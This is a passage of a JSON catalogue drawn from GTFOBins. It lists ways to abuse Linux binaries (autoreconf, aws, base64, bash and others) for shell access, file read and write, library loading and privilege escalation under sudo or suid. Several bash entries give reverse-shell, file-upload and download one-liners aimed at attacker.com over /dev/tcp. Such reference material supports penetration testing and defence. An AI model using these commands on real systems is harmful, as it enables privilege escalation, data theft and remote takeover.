/path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoheader/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoreconf:shell:0:sudo","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoreconf:shell:0:unprivileged","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:file-read:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:file-read:0:suid","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:file-read:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:inherit:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:inherit:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base32:file-read:0:sudo","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base32/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base32:file-read:0:suid","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base32/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base32:file-read:0:unprivileged","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base32/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base58:file-read:0:sudo","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base58/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base58:file-read:0:unprivileged","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base58/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base64:file-read:0:sudo","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base64/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base64:file-read:0:suid","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base64/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base64:file-read:0:unprivileged","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base64/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basenc:file-read:0:sudo","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basenc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basenc:file-read:0:suid","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basenc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basenc:file-read:0:unprivileged","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basenc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basez:file-read:0:sudo","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basez/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basez:file-read:0:suid","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basez/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basez:file-read:0:unprivileged","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basez/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bash:download:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -p -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:library-load:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:library-load:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -p -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:library-load:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:reverse-shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:reverse-shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:reverse-shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 